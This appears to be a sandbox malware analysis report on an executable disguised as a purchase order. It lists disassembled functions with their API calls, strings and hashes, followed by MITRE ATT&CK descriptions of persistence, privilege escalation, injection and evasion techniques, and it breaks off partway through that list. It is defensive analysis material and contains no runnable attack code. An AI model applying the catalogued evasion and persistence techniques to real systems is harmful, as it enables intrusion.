Instruction ID: 96f49d47f233934f97ff6fc98e2702f1e7ee9d77956f56a4b685f7c9de796b82
Opcode Fuzzy Hash: a40f8e116bfc696f368d88831b551c28d1c3d89a3c6c6fa4c88d08e655525652
Instruction Fuzzy Hash: 6821F0B5580304DBE780DF59F985E513BB5BB48314F10983AE9098B3A1E3F4A990CF4D

Function 0045A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON

Download Yara Rule

APIs

inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0045A84E
htons.WSOCK32(00000000,?,00000000), ref: 0045A88B

Strings

255.255.255.255, xrefs: 0045A866

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: htonsinet_addr
String ID: 255.255.255.255
API String ID: 3832099526-2422070025
Opcode ID: 247d1f042c941e4ceba1292f70c7cc75ae078602170ffbaf1e7425dee2c373b8
Instruction ID: 33c0523eded20f95c2541e34a1306b90952281821fa3487106dbad58873c6196
Opcode Fuzzy Hash: 247d1f042c941e4ceba1292f70c7cc75ae078602170ffbaf1e7425dee2c373b8
Instruction Fuzzy Hash: F7012674600304ABCB10EF68D886FADB364EF04315F10866BF912A73D2D739E819875A

Function 0043B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0043B7EF

Strings

ComboBox, xrefs: 0043B78B
ListBox, xrefs: 0043B7B9

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: b4fa11f08299f1cb44719dd08ff76bd0fd71c5c0fb2f2fe97a62c0fd4fd5e9ae
Instruction ID: faa06fab09b860605fa71cac64a851d916af7b13232032877203d1f3c0118a4b
Opcode Fuzzy Hash: b4fa11f08299f1cb44719dd08ff76bd0fd71c5c0fb2f2fe97a62c0fd4fd5e9ae
Instruction Fuzzy Hash: 9601F571A00114EBCB04EBA4DC52AFE7369EF49354B10072EF461632D2EB78590887E8

Function 0043B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000180,00000000,?), ref: 0043B6EB

Strings

ComboBox, xrefs: 0043B687
ListBox, xrefs: 0043B6B5

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 2dd0c978073301e0624ed0918eab732d0afd5455037bea25531d9f7abd34a921
Instruction ID: b8f5d47413315d950295729a5b1110aeefbe7e91dcf1101fa693de6a23fb402e
Opcode Fuzzy Hash: 2dd0c978073301e0624ed0918eab732d0afd5455037bea25531d9f7abd34a921
Instruction Fuzzy Hash: F3014471A41104ABCB05EBA5D953BFF73A89F09344F10112EB502732D2DB685E1897FE

Function 0043B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000182,?,00000000), ref: 0043B76C

Strings

ComboBox, xrefs: 0043B70A
ListBox, xrefs: 0043B738

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 784a9185c894f4c43e64d3d9a2b7014492d6470fd15c5f471a52d0cb84cfd9fc
Instruction ID: c3be138fd8a8966307237f1d2d4df2bf089ee9f861b5d3441c339aeace00059b
Opcode Fuzzy Hash: 784a9185c894f4c43e64d3d9a2b7014492d6470fd15c5f471a52d0cb84cfd9fc
Instruction Fuzzy Hash: 2D018FB1A41104EACB00E7A4DA52BFE73A8DB49348F10012FB901B32D2DB685E0987FD

Function 00424D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00424D9E
__calloc_crt.LIBCMT ref: 00424DB7

Strings

"L, xrefs: 00424DCE

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: __calloc_crt
String ID: "L
API String ID: 3494438863-1021959943
Opcode ID: 459589bf01f1e6131b3d3ec32ae4130910a5340231ecd4781b19d2833b58d21b
Instruction ID: eceeb894ac627c810ad756cc3828aaa3408dd9ea78c7f78f9365c7f2dbc213ef
Opcode Fuzzy Hash: 459589bf01f1e6131b3d3ec32ae4130910a5340231ecd4781b19d2833b58d21b
Instruction Fuzzy Hash: D1F028713183219AF3149F59BD40EA667D4E740724F50406FF201CA294EBF8C8818A9C

Function 00404024 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

LoadImageW.USER32(00400000,00000063,00000001,00000010,00000010,00000000), ref: 00404048
EnumResourceNamesW.KERNEL32(00000000,0000000E,004467E9,00000063,00000000,75A90280,?,?,00403EE1,?,?,000000FF), ref: 004741B3

Strings

>@, xrefs: 00404028

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: EnumImageLoadNamesResource
String ID: >@
API String ID: 1578290342-3542666865
Opcode ID: bab34c3f728c8b386ba82047d6e39d7d497ddc0bf13f65d9d22f117b650463ae
Instruction ID: e4973a436c4eec6c210a25eda4c59efc3669ea1aa6e7713dab2b8f7e5e7bc754
Opcode Fuzzy Hash: bab34c3f728c8b386ba82047d6e39d7d497ddc0bf13f65d9d22f117b650463ae
Instruction Fuzzy Hash: DDF0627164031077E2205B16EC4AFD63B59E746BB5F104526F314A61E1D3F49080879C

Function 00447744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00447762
_wcscmp.LIBCMT ref: 00447774

Strings

#32770, xrefs: 0044776E

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 19885046d328be14b13736f514f01db7c9f633ee2f0e495d3f61fe0272f84085
Instruction ID: 5da36549c17edabc345c5b580b635295ffd76962587edd0bfd7ecaf78b42af47
Opcode Fuzzy Hash: 19885046d328be14b13736f514f01db7c9f633ee2f0e495d3f61fe0272f84085
Instruction Fuzzy Hash: C8E09B7760422427D7109B96AC45EC7FB6CAB51764F01006BB905D3191E674A64187D8

Function 0043A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0043A63F

Part of subcall function 004213F1: _doexit.LIBCMT ref: 004213FB

Strings

AutoIt, xrefs: 0043A633
Error allocating memory., xrefs: 0043A638

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 1ba854038b8473aa083648953f2f752e322ff89e2bed0cc3a395ee1f50964944
Instruction ID: 5d97c885ed2fb4aad5e724718862caed6ad4245b0840fc8da154a937ba3d52f3
Opcode Fuzzy Hash: 1ba854038b8473aa083648953f2f752e322ff89e2bed0cc3a395ee1f50964944
Instruction Fuzzy Hash: 53D02B313C032833D21436993C17FCA36488B14B55F14043BBF0CA51E249EED58002ED

Function 0047AE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 0047ACC0
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0047AEBD

Strings

WIN_XPe, xrefs: 0047ACD3

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: DirectoryFreeLibrarySystem
String ID: WIN_XPe
API String ID: 510247158-3257408948
Opcode ID: f02dee9907a3410a0ad3bfb725c55c2b44904c0d5ea618dd59c9d693f90e6aae
Instruction ID: f0b89022b82c59c2a06aa5e0fa401b0a8aeab976c9a9b17577a1c73a37eb26dc
Opcode Fuzzy Hash: f02dee9907a3410a0ad3bfb725c55c2b44904c0d5ea618dd59c9d693f90e6aae
Instruction Fuzzy Hash: BFE06DB0C00209EFCB16DBA5D9449ECB7B8AB88301F14C097E006B2260CB745A89DF2B

Function 004686CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004686E2
PostMessageW.USER32(00000000), ref: 004686E9

Part of subcall function 00447A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00447AD0

Strings

Shell_TrayWnd, xrefs: 004686DB

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 233d69bc2109651c151c6ab7be64d206df7952a917d897a4023f45f426fbd46a
Instruction ID: 13f6a2cf583bc8a725f1f575c1c2257464a34b3c5b58d174a526da678b5d1d8b
Opcode Fuzzy Hash: 233d69bc2109651c151c6ab7be64d206df7952a917d897a4023f45f426fbd46a
Instruction Fuzzy Hash: 04D0C9317863287BF26467719C0BFCA6B589B04B21F100D2AB645AA1D0CAA8A940876D

Function 00468698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004686A2
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 004686B5

Part of subcall function 00447A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00447AD0

Strings

Shell_TrayWnd, xrefs: 0046869B

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: b4470d1f9ad659eaf171918a0757bf9f5813ac0af4253caff46f67b33da8d22d
Instruction ID: 5327e4fa2a42480748bb7cc66d897ba954c2bddabe160150f35467a3ae9de0ec
Opcode Fuzzy Hash: b4470d1f9ad659eaf171918a0757bf9f5813ac0af4253caff46f67b33da8d22d
Instruction Fuzzy Hash: D7D0C931785328B7E26467719C0BFDA6B589B04B21F100D2AB649AA1D0CAA8A9408768

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Driver: Driver Load, File: File Creation, File: File Modification, Module: Module Load
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Drive: Drive Access, File: File Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
